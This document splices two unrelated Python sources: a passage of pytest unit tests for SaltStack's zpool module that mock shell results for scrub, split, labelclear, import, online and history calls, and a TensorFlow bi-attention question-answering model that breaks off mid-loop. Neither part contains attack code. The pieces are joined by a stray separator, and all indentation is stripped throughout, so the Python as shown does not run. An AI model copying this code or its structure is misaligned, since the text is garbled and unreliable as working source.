mock_cmd = MagicMock(return_value=ret)
mock_exists = MagicMock(return_value=True)
with patch.dict(zpool.__salt__, {"zpool.exists": mock_exists}), patch.dict(
zpool.__salt__, {"cmd.run_all": mock_cmd}
), patch.dict(zpool.__utils__, utils_patch):
ret = zpool.scrub("mypool", pause=True)
res = OrderedDict(OrderedDict([("scrubbing", False)]))
assert ret == res
@pytest.mark.slow_test
def test_scrub_stop(utils_patch):
"""
Tests pauze of scrub
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
mock_exists = MagicMock(return_value=True)
with patch.dict(zpool.__salt__, {"zpool.exists": mock_exists}), patch.dict(
zpool.__salt__, {"cmd.run_all": mock_cmd}
), patch.dict(zpool.__utils__, utils_patch):
ret = zpool.scrub("mypool", stop=True)
res = OrderedDict(OrderedDict([("scrubbing", False)]))
assert ret == res
def test_split_success(utils_patch):
"""
Tests split on success
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.split("datapool", "backuppool")
res = OrderedDict([("split", True)])
assert ret == res
@pytest.mark.slow_test
def test_split_exist_new(utils_patch):
"""
Tests split on exising new pool
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = "Unable to split datapool: pool already exists"
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.split("datapool", "backuppool")
res = OrderedDict(
[
("split", False),
("error", "Unable to split datapool: pool already exists"),
]
)
assert ret == res
def test_split_missing_pool(utils_patch):
"""
Tests split on missing source pool
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = "cannot open 'datapool': no such pool"
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.split("datapool", "backuppool")
res = OrderedDict(
[("split", False), ("error", "cannot open 'datapool': no such pool")]
)
assert ret == res
@pytest.mark.slow_test
def test_split_not_mirror(utils_patch):
"""
Tests split on source pool is not a mirror
"""
ret = {}
ret["stdout"] = ""
ret[
"stderr"
] = "Unable to split datapool: Source pool must be composed only of mirrors"
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.split("datapool", "backuppool")
res = OrderedDict(
[
("split", False),
(
"error",
"Unable to split datapool: Source pool must be composed only of"
" mirrors",
),
]
)
assert ret == res
def test_labelclear_success(utils_patch):
"""
Tests labelclear on successful label removal
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.labelclear("/dev/rdsk/c0t0d0", force=False)
res = OrderedDict([("labelcleared", True)])
assert ret == res
def test_labelclear_nodevice(utils_patch):
"""
Tests labelclear on non existing device
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = "failed to open /dev/rdsk/c0t0d0: No such file or directory"
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.labelclear("/dev/rdsk/c0t0d0", force=False)
res = OrderedDict(
[
("labelcleared", False),
(
"error",
"failed to open /dev/rdsk/c0t0d0: No such file or directory",
),
]
)
assert ret == res
def test_labelclear_cleared(utils_patch):
"""
Tests labelclear on device with no label
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = "failed to read label from /dev/rdsk/c0t0d0"
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.labelclear("/dev/rdsk/c0t0d0", force=False)
res = OrderedDict(
[
("labelcleared", False),
("error", "failed to read label from /dev/rdsk/c0t0d0"),
]
)
assert ret == res
def test_labelclear_exported(utils_patch):
"""
Tests labelclear on device with from exported pool
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = "\n".join(
[
"use '-f' to override the following error:",
'/dev/rdsk/c0t0d0 is a member of exported pool "mypool"',
]
)
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.labelclear("/dev/rdsk/c0t0d0", force=False)
res = OrderedDict(
[
("labelcleared", False),
(
"error",
"use 'force=True' to override the following"
" error:\n/dev/rdsk/c0t0d0 is a member of exported pool"
' "mypool"',
),
]
)
assert ret == res
@pytest.mark.skip_if_binaries_missing("mkfile", reason="Cannot find mkfile executable")
def test_create_file_vdev_success(utils_patch):
"""
Tests create_file_vdev when out of space
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.create_file_vdev("64M", "/vdisks/disk0")
res = OrderedDict([("/vdisks/disk0", "created")])
assert ret == res
@pytest.mark.skip_if_binaries_missing("mkfile", reason="Cannot find mkfile executable")
def test_create_file_vdev_nospace(utils_patch):
"""
Tests create_file_vdev when out of space
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = (
"/vdisks/disk0: initialized 10424320 of 67108864 bytes: No space left on"
" device"
)
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.create_file_vdev("64M", "/vdisks/disk0")
res = OrderedDict(
[
("/vdisks/disk0", "failed"),
(
"error",
OrderedDict(
[
(
"/vdisks/disk0",
" initialized 10424320 of 67108864 bytes: No space"
" left on device",
),
]
),
),
]
)
assert ret == res
def test_export_success(utils_patch):
"""
Tests export
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.export("mypool")
res = OrderedDict([("exported", True)])
assert ret == res
@pytest.mark.slow_test
def test_export_nopool(utils_patch):
"""
Tests export when the pool does not exists
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = "cannot open 'mypool': no such pool"
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.export("mypool")
res = OrderedDict(
[("exported", False), ("error", "cannot open 'mypool': no such pool")]
)
assert ret == res
@pytest.mark.slow_test
def test_import_success(utils_patch):
"""
Tests import
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.import_("mypool")
res = OrderedDict([("imported", True)])
assert ret == res
def test_import_duplicate(utils_patch):
"""
Tests import with already imported pool
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = "\n".join(
[
"cannot import 'mypool': a pool with that name already exists",
"use the form 'zpool import <pool | id> <newpool>' to give it a new"
" name",
]
)
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.import_("mypool")
res = OrderedDict(
[
("imported", False),
(
"error",
"cannot import 'mypool': a pool with that name already"
" exists\nuse the form 'zpool import <pool | id> <newpool>' to"
" give it a new name",
),
]
)
assert ret == res
def test_import_nopool(utils_patch):
"""
Tests import
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = "cannot import 'mypool': no such pool available"
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.import_("mypool")
res = OrderedDict(
[
("imported", False),
("error", "cannot import 'mypool': no such pool available"),
]
)
assert ret == res
@pytest.mark.slow_test
def test_online_success(utils_patch):
"""
Tests online
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.online("mypool", "/dev/rdsk/c0t0d0")
res = OrderedDict([("onlined", True)])
assert ret == res
def test_online_nodevice(utils_patch):
"""
Tests online
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = "cannot online /dev/rdsk/c0t0d1: no such device in pool"
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.online("mypool", "/dev/rdsk/c0t0d1")
res = OrderedDict(
[
("onlined", False),
("error", "cannot online /dev/rdsk/c0t0d1: no such device in pool"),
]
)
assert ret == res
def test_offline_success(utils_patch):
"""
Tests offline
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.offline("mypool", "/dev/rdsk/c0t0d0")
res = OrderedDict([("offlined", True)])
assert ret == res
def test_offline_nodevice(utils_patch):
"""
Tests offline
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = "cannot offline /dev/rdsk/c0t0d1: no such device in pool"
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.offline("mypool", "/dev/rdsk/c0t0d1")
res = OrderedDict(
[
("offlined", False),
(
"error",
"cannot offline /dev/rdsk/c0t0d1: no such device in pool",
),
]
)
assert ret == res
def test_offline_noreplica(utils_patch):
"""
Tests offline
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = "cannot offline /dev/rdsk/c0t0d1: no valid replicas"
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.offline("mypool", "/dev/rdsk/c0t0d1")
res = OrderedDict(
[
("offlined", False),
("error", "cannot offline /dev/rdsk/c0t0d1: no valid replicas"),
]
)
assert ret == res
@pytest.mark.slow_test
def test_reguid_success(utils_patch):
"""
Tests reguid
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.reguid("mypool")
res = OrderedDict([("reguided", True)])
assert ret == res
@pytest.mark.slow_test
def test_reguid_nopool(utils_patch):
"""
Tests reguid with missing pool
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = "cannot open 'mypool': no such pool"
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.reguid("mypool")
res = OrderedDict(
[("reguided", False), ("error", "cannot open 'mypool': no such pool")]
)
assert ret == res
@pytest.mark.slow_test
def test_reopen_success(utils_patch):
"""
Tests reopen
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.reopen("mypool")
res = OrderedDict([("reopened", True)])
assert ret == res
def test_reopen_nopool(utils_patch):
"""
Tests reopen with missing pool
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = "cannot open 'mypool': no such pool"
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.reopen("mypool")
res = OrderedDict(
[("reopened", False), ("error", "cannot open 'mypool': no such pool")]
)
assert ret == res
def test_upgrade_success(utils_patch):
"""
Tests upgrade
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.upgrade("mypool")
res = OrderedDict([("upgraded", True)])
assert ret == res
def test_upgrade_nopool(utils_patch):
"""
Tests upgrade with missing pool
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = "cannot open 'mypool': no such pool"
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.upgrade("mypool")
res = OrderedDict(
[("upgraded", False), ("error", "cannot open 'mypool': no such pool")]
)
assert ret == res
@pytest.mark.slow_test
def test_history_success(utils_patch):
"""
Tests history
"""
ret = {}
ret["stdout"] = "\n".join(
[
"History for 'mypool':",
"2018-01-18.16:56:12 zpool create -f mypool /dev/rdsk/c0t0d0",
"2018-01-19.16:01:55 zpool attach -f mypool /dev/rdsk/c0t0d0"
" /dev/rdsk/c0t0d1",
]
)
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.history("mypool")
res = OrderedDict(
[
(
"mypool",
OrderedDict(
[
(
"2018-01-18.16:56:12",
"zpool create -f mypool /dev/rdsk/c0t0d0",
),
(
"2018-01-19.16:01:55",
"zpool attach -f mypool /dev/rdsk/c0t0d0"
" /dev/rdsk/c0t0d1",
),
]
),
),
]
)
assert ret == res
def test_history_nopool(utils_patch):
"""
Tests history with missing pool
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = "cannot open 'mypool': no such pool"
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.history("mypool")
res = OrderedDict([("error", "cannot open 'mypool': no such pool")])
assert ret == res
def test_clear_success(utils_patch):
"""
Tests clear
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = ""
ret["retcode"] = 0
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.clear("mypool")
res = OrderedDict([("cleared", True)])
assert ret == res
def test_clear_nopool(utils_patch):
"""
Tests clear with missing pool
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = "cannot open 'mypool': no such pool"
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.clear("mypool")
res = OrderedDict(
[("cleared", False), ("error", "cannot open 'mypool': no such pool")]
)
def test_clear_nodevice(utils_patch):
"""
Tests clear with non existign device
"""
ret = {}
ret["stdout"] = ""
ret["stderr"] = "cannot clear errors for /dev/rdsk/c0t0d0: no such device in pool"
ret["retcode"] = 1
mock_cmd = MagicMock(return_value=ret)
with patch.dict(zpool.__salt__, {"cmd.run_all": mock_cmd}), patch.dict(
zpool.__utils__, utils_patch
):
ret = zpool.clear("mypool", "/dev/rdsk/c0t0d0")
res = OrderedDict(
[
("cleared", False),
(
"error",
"cannot clear errors for /dev/rdsk/c0t0d0: no such device in"
" pool",
),
]
)
assert ret == res
|
|
import random
import itertools
import numpy as np
import tensorflow as tf
from tensorflow.python.ops.rnn_cell import BasicLSTMCell, GRUCell
from basic_cnn.read_data import DataSet
from basic_cnn.superhighway import SHCell
from my.tensorflow import exp_mask, get_initializer, VERY_SMALL_NUMBER
from my.tensorflow.nn import linear, double_linear_logits, linear_logits, softsel, dropout, get_logits, softmax, \
highway_network, multi_conv1d
from my.tensorflow.rnn import bidirectional_dynamic_rnn, dynamic_rnn
from my.tensorflow.rnn_cell import SwitchableDropoutWrapper, AttentionCell
def bi_attention(config, is_train, h, u, h_mask=None, u_mask=None, scope=None, tensor_dict=None):
"""
h_a:
all u attending on h
choosing an element of h that max-matches u
First creates confusion matrix between h and u
Then take max of the attention weights over u row
Finally softmax over
u_a:
each h attending on u
:param h: [N, M, JX, d]
:param u: [N, JQ, d]
:param h_mask: [N, M, JX]
:param u_mask: [N, B]
:param scope:
:return: [N, M, d], [N, M, JX, d]
"""
with tf.variable_scope(scope or "bi_attention"):
N, M, JX, JQ, d = config.batch_size, config.max_num_sents, config.max_sent_size, config.max_ques_size, config.hidden_size
JX = tf.shape(h)[2]
h_aug = tf.tile(tf.expand_dims(h, 3), [1, 1, 1, JQ, 1])
u_aug = tf.tile(tf.expand_dims(tf.expand_dims(u, 1), 1), [1, M, JX, 1, 1])
if h_mask is None:
and_mask = None
else:
h_mask_aug = tf.tile(tf.expand_dims(h_mask, 3), [1, 1, 1, JQ])
u_mask_aug = tf.tile(tf.expand_dims(tf.expand_dims(u_mask, 1), 1), [1, M, JX, 1])
and_mask = h_mask_aug & u_mask_aug
u_logits = get_logits([h_aug, u_aug], None, True, wd=config.wd, mask=and_mask,
is_train=is_train, func=config.logit_func, scope='u_logits') # [N, M, JX, JQ]
u_a = softsel(u_aug, u_logits) # [N, M, JX, d]
if tensor_dict is not None:
# a_h = tf.nn.softmax(h_logits) # [N, M, JX]
a_u = tf.nn.softmax(u_logits) # [N, M, JX, JQ]
# tensor_dict['a_h'] = a_h
tensor_dict['a_u'] = a_u
if config.bi:
h_a = softsel(h, tf.reduce_max(u_logits, 3)) # [N, M, d]
h_a = tf.tile(tf.expand_dims(h_a, 2), [1, 1, JX, 1])
else:
h_a = None
return u_a, h_a
def attention_layer(config, is_train, h, u, h_mask=None, u_mask=None, scope=None, tensor_dict=None):
with tf.variable_scope(scope or "attention_layer"):
u_a, h_a = bi_attention(config, is_train, h, u, h_mask=h_mask, u_mask=u_mask, tensor_dict=tensor_dict)
if config.bi:
p0 = tf.concat(3, [h , u_a, h * u_a, h * h_a])
else:
p0 = tf.concat(3, [h , u_a, h * u_a])
return p0
class Model(object):
def __init__(self, config, scope):
self.scope = scope
self.config = config
self.global_step = tf.get_variable('global_step', shape=[], dtype='int32',
initializer=tf.constant_initializer(0), trainable=False)
# Define forward inputs here
N, M, JX, JQ, VW, VC, W = \
config.batch_size, config.max_num_sents, config.max_sent_size, \
config.max_ques_size, config.word_vocab_size, config.char_vocab_size, config.max_word_size
self.x = tf.placeholder('int32', [N, M, None], name='x')
self.cx = tf.placeholder('int32', [N, M, None, W], name='cx')
self.x_mask = tf.placeholder('bool', [N, M, None], name='x_mask')
self.q = tf.placeholder('int32', [N, JQ], name='q')
self.cq = tf.placeholder('int32', [N, JQ, W], name='cq')
self.q_mask = tf.placeholder('bool', [N, JQ], name='q_mask')
self.y = tf.placeholder('bool', [N, M, JX], name='y')
self.is_train = tf.placeholder('bool', [], name='is_train')
self.new_emb_mat = tf.placeholder('float', [None, config.word_emb_size], name='new_emb_mat')
# Define misc
self.tensor_dict = {}
# Forward outputs / loss inputs
self.logits = None
self.yp = None
self.var_list = None
# Loss outputs
self.loss = None
self._build_forward()
self._build_loss()
if config.mode == 'train':
self._build_ema()
self.summary = tf.merge_all_summaries()
self.summary = tf.merge_summary(tf.get_collection("summaries", scope=self.scope))
def _build_forward(self):
config = self.config
N, M, JX, JQ, VW, VC, d, W = \
config.batch_size, config.max_num_sents, config.max_sent_size, \
config.max_ques_size, config.word_vocab_size, config.char_vocab_size, config.hidden_size, \
config.max_word_size
JX = tf.shape(self.x)[2]
dc, dw, dco = config.char_emb_size, config.word_emb_size, config.char_out_size
with tf.variable_scope("emb"):
with tf.variable_scope("emb_var"), tf.device("/cpu:0"):
char_emb_mat = tf.get_variable("char_emb_mat", shape=[VC, dc], dtype='float')
with tf.variable_scope("char"):
Acx = tf.nn.embedding_lookup(char_emb_mat, self.cx) # [N, M, JX, W, dc]
Acq = tf.nn.embedding_lookup(char_emb_mat, self.cq) # [N, JQ, W, dc]
Acx = tf.reshape(Acx, [-1, JX, W, dc])
Acq = tf.reshape(Acq, [-1, JQ, W, dc])
filter_sizes = list(map(int, config.out_channel_dims.split(',')))
heights = list(map(int, config.filter_heights.split(',')))
assert sum(filter_sizes) == dco
with tf.variable_scope("conv"):
xx = multi_conv1d(Acx, filter_sizes, heights, "VALID", self.is_train, config.keep_prob, scope="xx")
if config.share_cnn_weights:
tf.get_variable_scope().reuse_variables()
qq = multi_conv1d(Acq, filter_sizes, heights, "VALID", self.is_train, config.keep_prob, scope="xx")
else:
qq = multi_conv1d(Acq, filter_sizes, heights, "VALID", self.is_train, config.keep_prob, scope="qq")
xx = tf.reshape(xx, [-1, M, JX, dco])
qq = tf.reshape(qq, [-1, JQ, dco])
if config.use_word_emb:
with tf.variable_scope("emb_var"), tf.device("/cpu:0"):
if config.mode == 'train':
word_emb_mat = tf.get_variable("word_emb_mat", dtype='float', shape=[VW, dw], initializer=get_initializer(config.emb_mat))
else:
word_emb_mat = tf.get_variable("word_emb_mat", shape=[VW, dw], dtype='float')
if config.use_glove_for_unk:
word_emb_mat = tf.concat(0, [word_emb_mat, self.new_emb_mat])
with tf.name_scope("word"):
Ax = tf.nn.embedding_lookup(word_emb_mat, self.x) # [N, M, JX, d]
Aq = tf.nn.embedding_lookup(word_emb_mat, self.q) # [N, JQ, d]
self.tensor_dict['x'] = Ax
self.tensor_dict['q'] = Aq
xx = tf.concat(3, [xx, Ax]) # [N, M, JX, di]
qq = tf.concat(2, [qq, Aq]) # [N, JQ, di]
# highway network
with tf.variable_scope("highway"):
xx = highway_network(xx, config.highway_num_layers, True, wd=config.wd, is_train=self.is_train)
tf.get_variable_scope().reuse_variables()
qq = highway_network(qq, config.highway_num_layers, True, wd=config.wd, is_train=self.is_train)
self.tensor_dict['xx'] = xx
self.tensor_dict['qq'] = qq
cell = BasicLSTMCell(d, state_is_tuple=True)
d_cell = SwitchableDropoutWrapper(cell, self.is_train, input_keep_prob=config.input_keep_prob)
x_len = tf.reduce_sum(tf.cast(self.x_mask, 'int32'), 2) # [N, M]
q_len = tf.reduce_sum(tf.cast(self.q_mask, 'int32'), 1) # [N]
with tf.variable_scope("prepro"):
(fw_u, bw_u), ((_, fw_u_f), (_, bw_u_f)) = bidirectional_dynamic_rnn(d_cell, d_cell, qq, q_len, dtype='float', scope='u1') # [N, J, d], [N, d]
u = tf.concat(2, [fw_u, bw_u])
if config.two_prepro_layers:
(fw_u, bw_u), ((_, fw_u_f), (_, bw_u_f)) = bidirectional_dynamic_rnn(d_cell, d_cell, u, q_len, dtype='float', scope='u2') # [N, J, d], [N, d]
u = tf.concat(2, [fw_u, bw_u])
if config.share_lstm_weights:
tf.get_variable_scope().reuse_variables()
(fw_h, bw_h), _ = bidirectional_dynamic_rnn(cell, cell, xx, x_len, dtype='float', scope='u1') # [N, M, JX, 2d]
h = tf.concat(3, [fw_h, bw_h]) # [N, M, JX, 2d]
if config.two_prepro_layers:
(fw_h, bw_h), _ = bidirectional_dynamic_rnn(cell, cell, h, x_len, dtype='float', scope='u2') # [N, M, JX, 2d]
h = tf.concat(3, [fw_h, bw_h]) # [N, M, JX, 2d]
else:
(fw_h, bw_h), _ = bidirectional_dynamic_rnn(cell, cell, xx, x_len, dtype='float', scope='h1') # [N, M, JX, 2d]
h = tf.concat(3, [fw_h, bw_h]) # [N, M, JX, 2d]
if config.two_prepro_layers:
(fw_h, bw_h), _ = bidirectional_dynamic_rnn(cell, cell, h, x_len, dtype='float', scope='h2') # [N, M, JX, 2d]
h = tf.concat(3, [fw_h, bw_h]) # [N, M, JX, 2d]
self.tensor_dict['u'] = u
self.tensor_dict['h'] = h
with tf.variable_scope("main"):
p0 = attention_layer(config, self.is_train, h, u, h_mask=self.x_mask, u_mask=self.q_mask, scope="p0", tensor_dict=self.tensor_dict)
(fw_g0, bw_g0), _ = bidirectional_dynamic_rnn(d_cell, d_cell, p0, x_len, dtype='float', scope='g0') # [N, M, JX, 2d]
g0 = tf.concat(3, [fw_g0, bw_g0])
# p1 = attention_layer(config, self.is_train, g0, u, h_mask=self.x_mask, u_mask=self.q_mask, scope="p1")
(fw_g1, bw_g1), _ = bidirectional_dynamic_rnn(d_cell, d_cell, g0, x_len, dtype='float', scope='g1') # [N, M, JX, 2d]
g1 = tf.concat(3, [fw_g1, bw_g1])
# logits = u_logits(config, self.is_train, g1, u, h_mask=self.x_mask, u_mask=self.q_mask, scope="logits")
# [N, M, JX]
logits = get_logits([g1, p0], d, True, wd=config.wd, input_keep_prob=config.input_keep_prob, mask=self.x_mask, is_train=self.is_train, func=config.answer_func, scope='logits1')
a1i = softsel(tf.reshape(g1, [N, M*JX, 2*d]), tf.reshape(logits, [N, M*JX]))
if config.feed_gt:
logy = tf.log(tf.cast(self.y, 'float') + VERY_SMALL_NUMBER)
logits = tf.cond(self.is_train, lambda: logy, lambda: logits)
if config.feed_hard:
hard_yp = tf.argmax(tf.reshape(logits, [N, M*JX]), 1)
hard_logits = tf.reshape(tf.one_hot(hard_yp, M*JX), [N, M, JX]) # [N, M, JX]
logits = tf.cond(self.is_train, lambda: logits, lambda: hard_logits)
flat_logits = tf.reshape(logits, [-1, M * JX])
flat_yp = tf.nn.softmax(flat_logits) # [-1, M*JX]
yp = tf.reshape(flat_yp, [-1, M, JX])
self.tensor_dict['g1'] = g1
self.logits = flat_logits
self.yp = yp
def _build_loss(self):
config = self.config
N, M, JX, JQ, VW, VC = \
config.batch_size, config.max_num_sents, config.max_sent_size, \
config.max_ques_size, config.word_vocab_size, config.char_vocab_size
JX = tf.shape(self.x)[2]
loss_mask = tf.reduce_max(tf.cast(self.q_mask, 'float'), 1)
losses = -tf.log(tf.reduce_sum(self.yp * tf.cast(self.y, 'float'), [1, 2]) + VERY_SMALL_NUMBER)
ce_loss = tf.reduce_mean(loss_mask * losses)
tf.add_to_collection('losses', ce_loss)
self.loss = tf.add_n(tf.get_collection('losses', scope=self.scope), name='loss')
tf.scalar_summary(self.loss.op.name, self.loss)
tf.add_to_collection('ema/scalar', self.loss)
def _build_ema(self):
ema = tf.train.ExponentialMovingAverage(self.config.decay)
ema_op = ema.apply(tf.get_collection("ema/scalar", scope=self.scope) + tf.get_collection("ema/histogram", scope=self.scope))
for var in tf.get_collection("ema/scalar", scope=self.scope):
ema_var = ema.average(var)
tf.scalar_summary(ema_var.op.name, ema_var)
for var in tf.get_collection("ema/histogram", scope=self.scope):
ema_var = ema.average(var)
tf.histogram_summary(ema_var.op.name, ema_var)
with tf.control_dependencies([ema_op]):
self.loss = tf.identity(self.loss)
def get_loss(self):
return self.loss
def get_global_step(self):
return self.global_step
def get_var_list(self):
return self.var_list
def get_feed_dict(self, batch, is_train, supervised=True):
assert isinstance(batch, DataSet)
config = self.config
N, M, JX, JQ, VW, VC, d, W = \
config.batch_size, config.max_num_sents, config.max_sent_size, \
config.max_ques_size, config.word_vocab_size, config.char_vocab_size, config.hidden_size, config.max_word_size
feed_dict = {}
if config.len_opt:
"""
Note that this optimization results in variable GPU RAM usage (i.e. can cause OOM in the middle of training.)
First test without len_opt and make sure no OOM, and use len_opt
"""
if sum(len(para) for para in batch.data['x']) == 0:
new_JX = 1
else:
new_JX = max(len(para) for para in batch.data['x'])
JX = min(JX, new_JX)
# print(JX)
x = np.zeros([N, M, JX], dtype='int32')
cx = np.zeros([N, M, JX, W], dtype='int32')
x_mask = np.zeros([N, M, JX], dtype='bool')
q = np.zeros([N, JQ], dtype='int32')
cq = np.zeros([N, JQ, W], dtype='int32')
q_mask = np.zeros([N, JQ], dtype='bool')
feed_dict[self.x] = x
feed_dict[self.x_mask] = x_mask
feed_dict[self.cx] = cx
feed_dict[self.q] = q
feed_dict[self.cq] = cq
feed_dict[self.q_mask] = q_mask
feed_dict[self.is_train] = is_train
if config.use_glove_for_unk:
feed_dict[self.new_emb_mat] = batch.shared['new_emb_mat']
X = batch.data['x']
CX = batch.data['cx']
def _get_word(word):
if word.startswith("@"):
return 2
d = batch.shared['word2idx']
for each in (word, word.lower(), word.capitalize(), word.upper()):
if each in d:
return d[each]
if config.use_glove_for_unk:
d2 = batch.shared['new_word2idx']
for each in (word, word.lower(), word.capitalize(), word.upper()):
if each in d2:
return d2[each] + len(d)
return 1
def _get_char(char):
d = batch.shared['char2idx']
if char in d:
return d[char]
return 1
if supervised:
y = np.zeros([N, M, JX], dtype='int32')
feed_dict[self.y] = y
for i, (xi, yi) in enumerate(zip(batch.data['x'], batch.data['y'])):
count = 0
for j, xij in enumerate(xi):
for k, xijk in enumerate(xij):
if xijk == yi:
y[i, j, k] = True
count += 1
assert count > 0
for i, xi in enumerate(X):
